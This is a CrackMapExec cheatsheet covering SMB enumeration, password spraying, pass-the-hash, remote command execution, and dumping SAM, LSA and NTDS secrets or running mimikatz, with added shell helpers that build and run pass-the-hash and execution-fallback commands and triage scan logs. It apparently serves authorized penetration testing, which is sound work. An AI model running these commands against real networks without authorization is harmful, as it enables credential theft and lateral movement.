
crackmapexec Cheatsheet


CrackMapExec (CME) is a post-exploitation tool for assessing the security of Active Directory environments. It enumerates hosts, tests credentials, executes commands and dumps secrets across Windows networks over SMB, WinRM, LDAP, MSSQL, SSH and other protocols, authenticating with passwords, NTLM hashes or Kerberos. Development has continued in the NetExec (nxc) fork, which keeps the same command syntax.


Basic Usage

  • crackmapexec smb 192.168.1.0/24 - Discover SMB hosts and print OS, hostname, domain and signing status (no credentials needed)
  • crackmapexec smb 192.168.1.0/24 -u user -p pass - Test a credential against every host in the range
  • crackmapexec smb 192.168.1.0/24 -u user -H hash - Pass-the-hash (hash is an NT hash or an LM:NT pair)
  • crackmapexec smb 192.168.1.0/24 -u user -p pass -M module - Run a module on every host the credential works on

Protocols

  • smb - SMB/CIFS protocol
  • ssh - SSH protocol
  • winrm - WinRM protocol
  • ldap - LDAP protocol
  • mssql - Microsoft SQL Server
  • rdp - Remote Desktop Protocol
  • vnc - VNC protocol

Authentication

  • -u user - Username (or a file with one username per line)
  • -p password - Password (or a file with one password per line)
  • -H hash - NTLM hash: the NT hash alone or LM:NT
  • -k - Kerberos authentication (add --kdcHost when the KDC cannot be resolved by name)
  • -d domain - Domain name; authenticates against the domain rather than the local SAM
  • --local-auth - Authenticate against the host's local SAM instead of the domain
  • --no-bruteforce - With user and password files, pair line N with line N instead of trying every combination
  • --continue-on-success - Keep testing remaining hosts and credentials after a successful login
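The -H value trips people up: CME takes either an NT hash or an LM:NT pair, and the empty-password LM hash (aad3b435b51404eeaad3b435b51404ee) is frequently pasted on its own as if it were the NT hash. The following helper is an added example for this cheatsheet, not CrackMapExec's own code; the function names are assumptions. It normalizes whatever form of hash you have into LM:NT, refuses the empty-LM-only mistake, and prints the pass-the-hash command line (adding --local-auth when no domain is given):

```shell
#!/bin/sh
# Normalize the value handed to -H and build the pass-the-hash command line.
# Added example, not part of CrackMapExec; helper names are assumptions.
# EMPTY_LM is the well-known LM hash of an empty password (a public constant).
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"

# is_hex32 STRING: true when STRING is exactly 32 hex characters.
is_hex32() {
    case "$1" in
        *[!0-9a-fA-F]*) return 1 ;;
    esac
    [ "${#1}" -eq 32 ]
}

# cme_hash_arg HASH: print canonical lowercase LM:NT, or fail with a reason.
# Accepts NTHASH or LMHASH:NTHASH. Rejects the frequent copy/paste mistake of
# passing only the empty LM half, which CME would treat as the NT hash.
cme_hash_arg() {
    h=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$h" in
        *:*) lm=${h%%:*}; nt=${h#*:} ;;
        *)   lm=$EMPTY_LM; nt=$h ;;
    esac
    if ! is_hex32 "$lm" || ! is_hex32 "$nt"; then
        echo "bad hash format: $1 (want NTHASH or LMHASH:NTHASH, 32 hex chars each)" >&2
        return 1
    fi
    if [ "$nt" = "$EMPTY_LM" ]; then
        echo "refusing: $nt is the empty LM hash, not an NT hash" >&2
        return 1
    fi
    printf '%s:%s\n' "$lm" "$nt"
}

# cme_pth_cmd TARGET USER HASH [DOMAIN]: print the crackmapexec invocation.
# No DOMAIN means a local account, so --local-auth is added; otherwise -d.
cme_pth_cmd() {
    target=$1; user=$2; domain=${4:-}
    ntlm=$(cme_hash_arg "$3") || return 1
    if [ -n "$domain" ]; then
        printf 'crackmapexec smb %s -u %s -H %s -d %s\n' "$target" "$user" "$ntlm" "$domain"
    else
        printf 'crackmapexec smb %s -u %s -H %s --local-auth\n' "$target" "$user" "$ntlm"
    fi
}

# Usage: print the command, review it, then pipe it to sh to run it:
#   cme_pth_cmd 192.168.1.0/24 Administrator 31d6cfe0d16ae931b73c59d7e0c089c0 | sh
```

The functions only print the command, so you can inspect the exact hash and flags before anything touches the network; piping to sh runs it.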

Enumeration

  • --shares - List shares
  • --sessions - List sessions
  • --loggedon-users - Logged on users
  • --disks - List disks
  • --users - Enumerate domain users (the output includes the account description field, which is worth reading for stray passwords)
  • --groups - Enumerate groups
  • --computers - Enumerate computers
  • --pass-pol - Dump the domain password policy; check the lockout threshold before spraying

Execution

  • -x command - Execute a cmd.exe command and return its output
  • -X command - Execute a command through powershell.exe
  • -M module - Execute a module (-o KEY=VALUE sets module options)
  • --exec-method wmiexec - Execution method: wmiexec (default), smbexec, atexec or mmcexec
  • --no-output - Run the command without retrieving its output
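The default wmiexec method needs DCOM (TCP 135 plus a dynamic port) to the target; when that is filtered, smbexec or atexec usually still work over 445, at the cost of creating a service or a scheduled task on the host. The loop below is an added example, not CrackMapExec's own code: it tries the methods in order and stops at the first that returns output. RUNNER is an assumed hook that executes its arguments (pass env to run the real tool, or a stub when testing), and success is assumed to show up as the phrase "Executed command" in CME's output.

```shell
#!/bin/sh
# Try CME's execution methods in turn until one returns command output.
# Added example, not part of CrackMapExec. Assumptions: RUNNER executes its
# arguments ("env" for the real tool, a stub function for testing), and a
# successful run contains "Executed command" in CME's output.
# wmiexec (DCOM/135) is the default; smbexec and atexec fall back to 445 only,
# but are noisier because they create a service or a scheduled task.
cme_exec_with_fallback() {
    runner=$1; target=$2; user=$3; pass=$4; cmd=$5
    for method in wmiexec smbexec atexec; do
        out=$("$runner" crackmapexec smb "$target" -u "$user" -p "$pass" \
                  --exec-method "$method" -x "$cmd" 2>&1) || true
        case "$out" in
            *"Executed command"*)
                # Success: pass CME's output through and report the method used.
                printf '%s\n' "$out"
                echo "command ran on $target via $method" >&2
                return 0 ;;
        esac
        echo "$method failed on $target, trying next method" >&2
    done
    echo "all execution methods failed on $target" >&2
    return 1
}

# Usage against a real host (env simply runs the crackmapexec command line):
#   cme_exec_with_fallback env 192.168.1.10 admin 'Password123' whoami
```

Keep the order in mind when stealth matters: every fallback step is another authentication in the target's security log, and smbexec/atexec leave service and task artifacts that wmiexec does not.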

Common Examples

Enumerate SMB

crackmapexec smb 192.168.1.0/24

Scan the range for hosts answering on 445 and print OS version, hostname, domain and whether SMB signing is required. No credentials are needed.

Authenticate

crackmapexec smb 192.168.1.0/24 -u admin -p Password123

Test one credential against every host in the range. A (Pwn3d!) tag on a result line means the account is a local administrator on that host.

Pass-the-Hash

crackmapexec smb 192.168.1.0/24 -u admin -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Authenticate with an NTLM hash. -H takes the NT hash alone or an LM:NT pair; the pair shown is the well-known empty-password LM and NT hashes, so substitute the NT hash you recovered. Passing only the empty LM half aad3b435b51404eeaad3b435b51404ee is a common mistake and will not authenticate.

List Shares

crackmapexec smb 192.168.1.0/24 -u user -p pass --shares

Enumerate SMB shares.

Execute Command

crackmapexec smb 192.168.1.10 -u admin -p pass -x "whoami"

Run command on target.

PowerShell

crackmapexec smb 192.168.1.10 -u admin -p pass -X "Get-Process"

Execute PowerShell command.

Dump SAM

crackmapexec smb 192.168.1.10 -u admin -p pass --sam

Dump the local SAM password hashes (requires local admin on the target). --lsa dumps LSA secrets and cached domain credentials, and --ntds dumps the domain database from a domain controller.

List Modules

crackmapexec smb --list-modules

Show available modules.

Use Module

crackmapexec smb 192.168.1.10 -u admin -p pass -M mimikatz

Execute the mimikatz module on the target; module options are passed with -o KEY=VALUE.
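Across a /24 the commands above produce hundreds of lines, and the ones worth acting on are a handful: logins tagged (Pwn3d!), discovery lines with signing:False (the precondition for NTLM relay), and share rows with WRITE. The functions below are an added example, not CrackMapExec's own code; they assume CME's column layout PROTO IP PORT HOSTNAME MESSAGE and read the text CME prints (tee it to a file, or use the copies CME keeps under ~/.cme/logs). The sample log is constructed in CME's format, not a real scan.

```shell
#!/bin/sh
# Triage saved CME output: which hosts gave admin, which are relayable, and
# where writable shares are. Added example, not CME's own code.
# Column layout assumed: PROTO IP PORT HOSTNAME MESSAGE...

# Hosts where the credential was local admin: CME tags the login line "(Pwn3d!)".
cme_admin_hosts() { awk '/\(Pwn3d!\)/ { print $2 }' | sort -u; }

# Hosts whose discovery line reports signing:False, i.e. SMB signing not
# required, which is what an NTLM relay against them needs.
cme_unsigned_hosts() { awk '/\(signing:False\)/ { print $2 }' | sort -u; }

# "IP SHARE" for each share row whose permission column contains WRITE.
# Share rows are PROTO IP PORT HOST NAME PERMS REMARK...; header, separator
# and status rows never carry WRITE in column 6. A share name containing a
# space would shift the columns, so review those rows by hand.
cme_writable_shares() { awk '$6 ~ /WRITE/ { print $2, $5 }'; }

# Constructed sample in CME's output format (not a real scan), for a dry run.
cme_sample() {
    cat <<'EOF'
SMB  192.168.1.10  445  DC01  [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  192.168.1.11  445  WS01  [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  192.168.1.12  445  WS02  [*] Windows 10.0 Build 19041 x64 (name:WS02) (domain:corp.local) (signing:False) (SMBv1:True)
SMB  192.168.1.10  445  DC01  [+] corp.local\admin:Password123 (Pwn3d!)
SMB  192.168.1.11  445  WS01  [+] corp.local\admin:Password123
SMB  192.168.1.12  445  WS02  [-] corp.local\admin:Password123 STATUS_LOGON_FAILURE
SMB  192.168.1.10  445  DC01  [+] Enumerated shares
SMB  192.168.1.10  445  DC01  Share      Permissions  Remark
SMB  192.168.1.10  445  DC01  -----      -----------  ------
SMB  192.168.1.10  445  DC01  ADMIN$     READ,WRITE   Remote Admin
SMB  192.168.1.10  445  DC01  C$         READ,WRITE   Default share
SMB  192.168.1.10  445  DC01  IPC$       READ         Remote IPC
SMB  192.168.1.10  445  DC01  NETLOGON   READ         Logon server share
SMB  192.168.1.11  445  WS01  [+] Enumerated shares
SMB  192.168.1.11  445  WS01  Share      Permissions  Remark
SMB  192.168.1.11  445  WS01  -----      -----------  ------
SMB  192.168.1.11  445  WS01  Public     READ,WRITE
SMB  192.168.1.11  445  WS01  IPC$       READ         Remote IPC
EOF
}

# Usage with a real log:  cme_admin_hosts < cme.log
# Dry run on the sample:
cme_sample | cme_admin_hosts        # 192.168.1.10
cme_sample | cme_unsigned_hosts     # 192.168.1.11 and 192.168.1.12
cme_sample | cme_writable_shares    # ADMIN$ and C$ on .10, Public on .11
```

ADMIN$ and C$ showing READ,WRITE is just the admin result restated; the interesting finding in the sample is Public on 192.168.1.11, writable by an account that is not an admin there.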


Tips

  • Use -H for pass-the-hash; the value is an NT hash or an LM:NT pair, never the empty LM half alone
  • A (Pwn3d!) tag on a login line means the credential is a local admin on that host
  • Run --pass-pol and read the lockout threshold before spraying user and password files; --continue-on-success keeps going after a hit
  • Use --shares to discover file shares; READ,WRITE on a share that is not ADMIN$ or C$ is often the first foothold
  • Use -x for cmd.exe and -X for PowerShell; both default to wmiexec, switch with --exec-method smbexec or atexec if DCOM is filtered
  • Check --list-modules for available modules and pass module options with -o
  • Use -k for Kerberos authentication, with --kdcHost when the KDC is not resolvable
  • Hosts reporting signing:False in the discovery line do not require SMB signing and are candidates for NTLM relay
  • CME is a lateral movement tool, not a stealthy one: every login is recorded on the target, and smbexec/atexec leave service and task artifacts